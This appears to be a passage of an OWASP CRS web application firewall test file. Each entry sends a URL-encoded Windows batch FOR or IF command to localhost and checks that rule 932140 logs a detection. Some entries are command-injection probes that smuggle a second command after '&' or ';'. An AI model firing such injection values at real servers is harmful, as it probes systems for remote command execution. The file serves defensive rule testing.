test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2Ff+%22tokens%3D%2A%22+%25G+IN+%28%27dir+%2Fb%27%29+DO+%28call+%3Asubroutine+%22%25G%22%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-37 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2Ff+%22tokens%3D%2A%22+%25%25G+IN+%28%27dir+%2Fb%27%29+DO+%28call+%3Asubroutine+%22%25%25G%22%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-38 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FF+%22tokens%3D1-5%22+%25A+IN+%28%22This+is+a+short+sentence%22%29+DO+%40echo+%25A+%25B+%25D" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-39 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FF+%22tokens%3D1-5%22+%25%25A+IN+%28%22This+is+a+short+sentence%22%29+DO+%40echo+%25%25A+%25%25B+%25%25D" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-40 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - 
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%25G+IN+%28a%2Cb%2Cc%2Cd%2Ce%2Cf%2Cg%2Ch%2Ci%2Cj%2Ck%2Cl%2Cm%2Cn%2Co%2Cp%2Cq%2Cr%2Cs%2Ct%2Cu%2Cv%2Cw%2Cx%2Cy%2Cz%29+DO+%28md+C%3A%5Cdemo%5C%25G%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-41 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%25%25G+IN+%28a%2Cb%2Cc%2Cd%2Ce%2Cf%2Cg%2Ch%2Ci%2Cj%2Ck%2Cl%2Cm%2Cn%2Co%2Cp%2Cq%2Cr%2Cs%2Ct%2Cu%2Cv%2Cw%2Cx%2Cy%2Cz%29+DO+%28md+C%3A%5Cdemo%5C%25%25G%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-42 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FL+%25G+IN+%281%2C1%2C5%29+DO+echo+%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-43 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FL+%25%25G+IN+%281%2C1%2C5%29+DO+echo+%25%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-44 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%25G+IN+%28Sun+Mon+Tue+Wed+Thur+Fri+Sat%29+DO+echo+%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-45 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%25%25G+IN+%28Sun+Mon+Tue+Wed+Thur+Fri+Sat%29+DO+echo+%25%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-46 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for+%2Ff+%22tokens%3D%2A%22+%25G+in+%28%27dir+%2Fb+%2Fs+%2Fa%3Ad+%22C%3A%5CWork%5Creports%2A%22%27%29+do+echo+Found+%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-47 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for+%2Ff+%22tokens%3D%2A%22+%25%25G+in+%28%27dir+%2Fb+%2Fs+%2Fa%3Ad+%22C%3A%5CWork%5Creports%2A%22%27%29+do+echo+Found+%25%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-48 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 
Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FD+%2Fr+%25G+in+%28%22User%2A%22%29+DO+Echo+We+found+%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-49 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FF+%22tokens%3D1%2C3+delims%3D%2C%22+%25%25G+IN+%28weather.txt%29+DO+%40echo+%25%25G+%25%25H" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-50 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FF+%22tokens%3D4+delims%3D%2C%22+%25%25G+IN+%28%22deposit%2C%244500%2C123.4%2C12-AUG-09%22%29+DO+%40echo+Date+paid+%25%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-51 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FF+%25G+IN+%28%27%22C%3A%5Cprogram+Files%5Ccommand.exe%22%27%29+DO+ECHO+%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-52 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: 
"/get?foo=FOR+%2FF+%25%25G+IN+%28%27%22C%3A%5Cprogram+Files%5Ccommand.exe%22%27%29+DO+ECHO+%25%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-53 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FF+%22tokens%3D1%2C2%2A+delims%3D%2C%22+%25%25+IN+%28C%3A%5CMyDocu%7E1%5Cmytex%7E1.txt%29+DO+ECHO+%25%25" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-54 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FF+%22tokens%3D1%2C2%2A+delims%3D%2C%22+%25%25G+IN+%28C%3A%5CMyDocu%7E1%5Cmytex%7E1.txt%29+DO+ECHO+%25%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-55 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FF+%22usebackq+tokens%3D1%2C2%2A+delims%3D%2C%22+%25G+IN+%28%22C%3A%5CMy+Documents%5Cmy+textfile.txt%22%29+DO+ECHO+%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-56 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: 
"/get?foo=FOR+%2FF+%22usebackq+tokens%3D1%2C2%2A+delims%3D%2C%22+%25%25G+IN+%28%22C%3A%5CMy+Documents%5Cmy+textfile.txt%22%29+DO+ECHO+%25%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-57 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+for+%2Ff+%5C%22delims%3D%5C%22+%25i+in+%28%27cmd+%2Fc+%5C%22set+%2Fa+%2863%2B21%29%5C%22%27%29+do+%40set+%2Fp+%3D+PDVQIS%25iPDVQISPDVQIS%3C+nul" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-58 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%3Bfor+%2Ff+%5C%22delims%3D%5C%22+%25i+in+%28%27cmd+%2Fc+%5C%22set+%2Fa+%2835%2B66%29%5C%22%27%29+do+%40set+%2Fp+%3D+LZEUZE%25iLZEUZELZEUZE%3C+nul%27" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-59 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for+%2Ff+%22tokens%3D%2A+delims%3D0%22+%25%25A+in+%28%22%25n1%25%22%29+do+set+%22n1%3D%25%25A%22" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-60 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP 
CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=for+%25i+in+%28%2A%29+do+set+LIST%3D+%25i"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-61
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=for+%25i+in+%28%2A%29+do+set+LIST%3D%21LIST%21+%25i"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-62
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=for+%2Fl+%25%25I+in+%280%2C1%2C5%29+do+call+echo+%25%25RANDOM%25%25"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-63
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=for+%25%25d+in+%28A%2CC%2CD%29+do+DIR+%25%25d+%2A.%2A"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-64
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=for+%25%25f+in+%28%2A.TXT+%2A.BAT+%2A.DOC%29+do+TYPE+%25%25f"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-65
- desc: imported test
- stages:
- - stage:
- input: - 
dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=for+%25%25P+in+%28%25PATH%25%29+do+if+exist+%25%25P%5C%2A.BAT+COPY+%25%25P%5C%2A.BAT+C%3A%5CBAT"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-66
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++EXIST+filename.txt+++++%28"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-67
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++EXIST+filename+++++++++CMD"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-68
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++EXIST+filename+++++++++%28CMD%29"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-69
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: 
"/get?foo=IF++++++++EXIST+data.xls+++++++++Echo+The+file+was+found."
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-70
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++EXIST+MyFile.txt+++++++%28ECHO+Some%5Bmore%5DPotatoes%29"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-71
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++EXIST+C%3A%5Cpagefile.sys++CMD"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-72
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++EXIST+C%3A%5Cpagefile.sys++%28CMD%29+ELSE+%28CMD%29"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-73
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++NOT+EXIST+C%3A%5Cnonexistent+++CMD"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-74
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF+%2FI+NOT+EXIST+C%3A%5Cnonexistent+++echo+hey"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-75
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF+++%2FI+++NOT+++EXIST+++C%3A%5Cnonexistent+++echo+hey"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-76
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++NOT+EXIST+C%3A%5Cnonexistent+++%28CMD%29+ELSE+%28CMD%29"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-77
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++NOT+EXIST+%28C%3A%5Cnonexistent%29+ECHO+pwnt"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-78
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++DEFINED+variable+++++++CMD"
- version: HTTP/1.0 - 
output:
- log_contains: id "932140"
- - test_title: 932140-79
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++NOT+DEFINED+_example+++++++ECHO+Value+Missing"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-80
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++ERRORLEVEL+0+++++++++++CMD"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-81
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++NOT+ERRORLEVEL+0+++++++++++CMD"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-82
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++CMDEXTVERSION+1++++++++GOTO+start_process"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-83
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP 
CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++2++++++++++++GEQ+15++++echo+%22bigger%22"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-84
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++%222%22++++++++++GEQ+%2215%22++echo+%22bigger%22"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-85
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+EQU+2+++++goto+sub_problem2"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-86
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+NEQ+0+++++echo+test"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-87
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+LEQ+2+++++echo+test"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-88
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1 - 
headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+GTR+2+++++echo+test"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-89
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+GEQ+2+++++echo+test"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-90
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++%25VARIABLE%25+++GTR+0+++++Echo+An+error+was+found"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-91
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++%25VARIABLE%25+++LSS+0+++++Echo+An+error+was+found"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-92
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: 
"/get?foo=IF++++++++%25VARIABLE%25+++EQU+0+++++Echo+An+error+was+found"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-93
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF+%2FI+++++item1%3D%3Ditem2+++++++++++CMD"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-94
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF+%2FI+NOT+item1%3D%3Ditem2+++++++++++CMD"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-95
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF+%2FI+NOT+1%3D%3D2+++++++++++++++++++CMD"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
